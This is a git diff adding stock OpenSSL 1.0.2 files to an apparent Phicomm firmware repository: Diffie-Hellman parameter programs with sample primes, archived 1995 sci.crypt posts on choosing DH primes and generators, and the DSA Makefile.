+fbcd2ccf062b242d7a567ba8bbb40d79bca7b8e0b6c05f835a5b938d985816bc648985adcff5402a
+a76756b36c845a840a1d059ce02707e19cf47af0b5a882f32315c19d1b86a56c5389c5e9bee16b65
+fde7b1a8d74a7675de9b707d4c5a4633c0290c95ff30a605aeb7ae864ff48370f13cf01d49adb9f2
+3d19a439f753ee7703cf342d87f431105c843c78ca4df639931f3458fae8a94d1687e99a76ed99d0
+ba87189f42fd31ad8262c54a8cf5914ae6c28c540d714a5f6087a171fb74f4814c6f968d72386ef3
+56a05180c3bec7ddd5ef6fe76b1f717b
+
+The generator, g, for this prime is 2.
+
+Thanks!
+
+Phil Karn
+
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/generate b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/generate
new file mode 100644
index 0000000..5d40723
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/generate
@@ -0,0 +1,65 @@
+From: stewarts@ix.netcom.com (Bill Stewart)
+Newsgroups: sci.crypt
+Subject: Re: Diffie-Hellman key exchange
+Date: Wed, 11 Oct 1995 23:08:28 GMT
+Organization: Freelance Information Architect
+Lines: 32
+Message-ID: <45hir2$7l8@ixnews7.ix.netcom.com>
+References: <458rhn$76m$1@mhadf.production.compuserve.com>
+NNTP-Posting-Host: ix-pl4-16.ix.netcom.com
+X-NETCOM-Date: Wed Oct 11  4:09:22 PM PDT 1995
+X-Newsreader: Forte Free Agent 1.0.82
+
+Kent Briggs <72124.3234@CompuServe.COM> wrote:
+
+>I have a copy of the 1976 IEEE article describing the
+>Diffie-Hellman public key exchange algorithm: y=a^x mod q.  I'm
+>looking for sources that give examples of secure a,q pairs and
+>possible some source code that I could examine.
+
+q should be prime, and ideally should be a "strong prime",
+which means it's of the form 2n+1 where n is also prime.
+q also needs to be long enough to prevent the attacks LaMacchia and
+Odlyzko described (some variant on a factoring attack which generates
+a large pile of simultaneous equations and then solves them);
+long enough is about the same size as factoring, so 512 bits may not
+be secure enough for most applications.  (The 192 bits used by
+"secure NFS" was certainly not long enough.)
+
+a should be a generator for q, which means it needs to be
+relatively prime to q-1.   Usually a small prime like 2, 3 or 5 will
+work.  
+
+....
+
+Date: Tue, 26 Sep 1995 13:52:36 MST
+From: "Richard Schroeppel" <rcs@cs.arizona.edu>
+To: karn
+Cc: ho@cs.arizona.edu
+Subject: random large primes
+
+Since your prime is really random, proving it is hard.
+My personal limit on rigorously proved primes is ~350 digits.
+If you really want a proof, we should talk to Francois Morain,
+or the Australian group.
+
+If you want 2 to be a generator (mod P), then you need it
+to be a non-square.  If (P-1)/2 is also prime, then
+non-square == primitive-root for bases << P.
+
+In the case at hand, this means 2 is a generator iff P = 11 (mod 24).
+If you want this, you should restrict your sieve accordingly.
+
+3 is a generator iff P = 5 (mod 12).
+
+5 is a generator iff P = 3 or 7 (mod 10).
+
+2 is perfectly usable as a base even if it's a non-generator, since
+it still covers half the space of possible residues.  And an
+eavesdropper can always determine the low-bit of your exponent for
+a generator anyway.
+
+Rich  rcs@cs.arizona.edu
+
+
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/p1024.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/p1024.c
new file mode 100644
index 0000000..a4b014b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/p1024.c
@@ -0,0 +1,92 @@
+/* crypto/dh/p1024.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <openssl/bn.h>
+#include <openssl/asn1.h>
+#include <openssl/dh.h>
+#include <openssl/pem.h>
+
+unsigned char data[] = { 0x97, 0xF6, 0x42, 0x61, 0xCA, 0xB5, 0x05, 0xDD,
+    0x28, 0x28, 0xE1, 0x3F, 0x1D, 0x68, 0xB6, 0xD3,
+    0xDB, 0xD0, 0xF3, 0x13, 0x04, 0x7F, 0x40, 0xE8,
+    0x56, 0xDA, 0x58, 0xCB, 0x13, 0xB8, 0xA1, 0xBF,
+    0x2B, 0x78, 0x3A, 0x4C, 0x6D, 0x59, 0xD5, 0xF9,
+    0x2A, 0xFC, 0x6C, 0xFF, 0x3D, 0x69, 0x3F, 0x78,
+    0xB2, 0x3D, 0x4F, 0x31, 0x60, 0xA9, 0x50, 0x2E,
+    0x3E, 0xFA, 0xF7, 0xAB, 0x5E, 0x1A, 0xD5, 0xA6,
+    0x5E, 0x55, 0x43, 0x13, 0x82, 0x8D, 0xA8, 0x3B,
+    0x9F, 0xF2, 0xD9, 0x41, 0xDE, 0xE9, 0x56, 0x89,
+    0xFA, 0xDA, 0xEA, 0x09, 0x36, 0xAD, 0xDF, 0x19,
+    0x71, 0xFE, 0x63, 0x5B, 0x20, 0xAF, 0x47, 0x03,
+    0x64, 0x60, 0x3C, 0x2D, 0xE0, 0x59, 0xF5, 0x4B,
+    0x65, 0x0A, 0xD8, 0xFA, 0x0C, 0xF7, 0x01, 0x21,
+    0xC7, 0x47, 0x99, 0xD7, 0x58, 0x71, 0x32, 0xBE,
+    0x9B, 0x99, 0x9B, 0xB9, 0xB7, 0x87, 0xE8, 0xAB,
+};
+
+main()
+{
+    DH *dh;
+
+    dh = DH_new();
+    dh->p = BN_bin2bn(data, sizeof(data), NULL);
+    dh->g = BN_new();
+    BN_set_word(dh->g, 2);
+    PEM_write_DHparams(stdout, dh);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/p192.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/p192.c
new file mode 100644
index 0000000..9f49f76
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/p192.c
@@ -0,0 +1,80 @@
+/* crypto/dh/p192.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <openssl/bn.h>
+#include <openssl/asn1.h>
+#include <openssl/dh.h>
+#include <openssl/pem.h>
+
+unsigned char data[] = {
+    0xD4, 0xA0, 0xBA, 0x02, 0x50, 0xB6, 0xFD, 0x2E,
+    0xC6, 0x26, 0xE7, 0xEF, 0xD6, 0x37, 0xDF, 0x76,
+    0xC7, 0x16, 0xE2, 0x2D, 0x09, 0x44, 0xB8, 0x8B,
+};
+
+main()
+{
+    DH *dh;
+
+    dh = DH_new();
+    dh->p = BN_bin2bn(data, sizeof(data), NULL);
+    dh->g = BN_new();
+    BN_set_word(dh->g, 3);
+    PEM_write_DHparams(stdout, dh);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/p512.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/p512.c
new file mode 100644
index 0000000..606fa4d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/p512.c
@@ -0,0 +1,85 @@
+/* crypto/dh/p512.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <openssl/bn.h>
+#include <openssl/asn1.h>
+#include <openssl/dh.h>
+#include <openssl/pem.h>
+
+unsigned char data[] = {
+    0xDA, 0x58, 0x3C, 0x16, 0xD9, 0x85, 0x22, 0x89,
+    0xD0, 0xE4, 0xAF, 0x75, 0x6F, 0x4C, 0xCA, 0x92,
+    0xDD, 0x4B, 0xE5, 0x33, 0xB8, 0x04, 0xFB, 0x0F,
+    0xED, 0x94, 0xEF, 0x9C, 0x8A, 0x44, 0x03, 0xED,
+    0x57, 0x46, 0x50, 0xD3, 0x69, 0x99, 0xDB, 0x29,
+    0xD7, 0x76, 0x27, 0x6B, 0xA2, 0xD3, 0xD4, 0x12,
+    0xE2, 0x18, 0xF4, 0xDD, 0x1E, 0x08, 0x4C, 0xF6,
+    0xD8, 0x00, 0x3E, 0x7C, 0x47, 0x74, 0xE8, 0x33,
+};
+
+main()
+{
+    DH *dh;
+
+    dh = DH_new();
+    dh->p = BN_bin2bn(data, sizeof(data), NULL);
+    dh->g = BN_new();
+    BN_set_word(dh->g, 2);
+    PEM_write_DHparams(stdout, dh);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/Makefile
new file mode 100644
index 0000000..f5c4e90
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/Makefile
@@ -0,0 +1,199 @@
+#
+# OpenSSL/crypto/dsa/Makefile
+#
+
+DIR=	dsa
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=dsatest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= dsa_gen.c dsa_key.c dsa_lib.c dsa_asn1.c dsa_vrf.c dsa_sign.c \
+	dsa_err.c dsa_ossl.c dsa_depr.c dsa_ameth.c dsa_pmeth.c dsa_prn.c
+LIBOBJ= dsa_gen.o dsa_key.o dsa_lib.o dsa_asn1.o dsa_vrf.o dsa_sign.o \
+	dsa_err.o dsa_ossl.o dsa_depr.o dsa_ameth.o dsa_pmeth.o dsa_prn.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= dsa.h
+HEADER=	dsa_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o */*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+dsa_ameth.o: ../../e_os.h ../../include/openssl/asn1.h
+dsa_ameth.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+dsa_ameth.o: ../../include/openssl/buffer.h ../../include/openssl/cms.h
+dsa_ameth.o: ../../include/openssl/crypto.h ../../include/openssl/dsa.h
+dsa_ameth.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+dsa_ameth.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+dsa_ameth.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+dsa_ameth.o: ../../include/openssl/opensslconf.h
+dsa_ameth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dsa_ameth.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+dsa_ameth.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+dsa_ameth.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+dsa_ameth.o: ../../include/openssl/x509_vfy.h ../asn1/asn1_locl.h ../cryptlib.h
+dsa_ameth.o: dsa_ameth.c
+dsa_asn1.o: ../../e_os.h ../../include/openssl/asn1.h
+dsa_asn1.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+dsa_asn1.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dsa_asn1.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+dsa_asn1.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dsa_asn1.o: ../../include/openssl/opensslconf.h
+dsa_asn1.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dsa_asn1.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+dsa_asn1.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dsa_asn1.o: ../cryptlib.h dsa_asn1.c
+dsa_depr.o: ../../e_os.h ../../include/openssl/asn1.h
+dsa_depr.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+dsa_depr.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dsa_depr.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+dsa_depr.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+dsa_depr.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+dsa_depr.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+dsa_depr.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dsa_depr.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+dsa_depr.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+dsa_depr.o: ../../include/openssl/symhacks.h ../cryptlib.h dsa_depr.c
+dsa_err.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+dsa_err.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+dsa_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dsa_err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dsa_err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dsa_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dsa_err.o: dsa_err.c
+dsa_gen.o: ../../e_os.h ../../include/openssl/asn1.h
+dsa_gen.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+dsa_gen.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dsa_gen.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+dsa_gen.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+dsa_gen.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+dsa_gen.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+dsa_gen.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dsa_gen.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+dsa_gen.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+dsa_gen.o: ../../include/openssl/symhacks.h ../cryptlib.h dsa_gen.c dsa_locl.h
+dsa_key.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+dsa_key.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dsa_key.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+dsa_key.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dsa_key.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dsa_key.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+dsa_key.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dsa_key.o: ../../include/openssl/symhacks.h ../cryptlib.h dsa_key.c
+dsa_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+dsa_lib.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+dsa_lib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dsa_lib.o: ../../include/openssl/dh.h ../../include/openssl/dsa.h
+dsa_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+dsa_lib.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+dsa_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dsa_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dsa_lib.o: ../../include/openssl/symhacks.h ../cryptlib.h dsa_lib.c
+dsa_ossl.o: ../../e_os.h ../../include/openssl/asn1.h
+dsa_ossl.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+dsa_ossl.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dsa_ossl.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+dsa_ossl.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dsa_ossl.o: ../../include/openssl/opensslconf.h
+dsa_ossl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dsa_ossl.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+dsa_ossl.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+dsa_ossl.o: ../../include/openssl/symhacks.h ../cryptlib.h dsa_ossl.c
+dsa_pmeth.o: ../../e_os.h ../../include/openssl/asn1.h
+dsa_pmeth.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+dsa_pmeth.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+dsa_pmeth.o: ../../include/openssl/crypto.h ../../include/openssl/dsa.h
+dsa_pmeth.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+dsa_pmeth.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+dsa_pmeth.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+dsa_pmeth.o: ../../include/openssl/opensslconf.h
+dsa_pmeth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dsa_pmeth.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+dsa_pmeth.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+dsa_pmeth.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+dsa_pmeth.o: ../../include/openssl/x509_vfy.h ../cryptlib.h ../evp/evp_locl.h
+dsa_pmeth.o: dsa_locl.h dsa_pmeth.c
+dsa_prn.o: ../../e_os.h ../../include/openssl/asn1.h
+dsa_prn.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+dsa_prn.o: ../../include/openssl/crypto.h ../../include/openssl/dsa.h
+dsa_prn.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+dsa_prn.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+dsa_prn.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+dsa_prn.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dsa_prn.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dsa_prn.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dsa_prn.o: ../cryptlib.h dsa_prn.c
+dsa_sign.o: ../../e_os.h ../../include/openssl/bio.h ../../include/openssl/bn.h
+dsa_sign.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dsa_sign.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+dsa_sign.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dsa_sign.o: ../../include/openssl/opensslconf.h
+dsa_sign.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dsa_sign.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+dsa_sign.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dsa_sign.o: ../cryptlib.h dsa_sign.c
+dsa_vrf.o: ../../e_os.h ../../include/openssl/bio.h
+dsa_vrf.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dsa_vrf.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+dsa_vrf.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dsa_vrf.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dsa_vrf.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dsa_vrf.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dsa_vrf.o: ../cryptlib.h dsa_vrf.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/Makefile.bak
new file mode 100644
index 0000000..f5c4e90
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/Makefile.bak
@@ -0,0 +1,199 @@
+#
+# OpenSSL/crypto/dsa/Makefile
+#
+
+DIR=	dsa
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
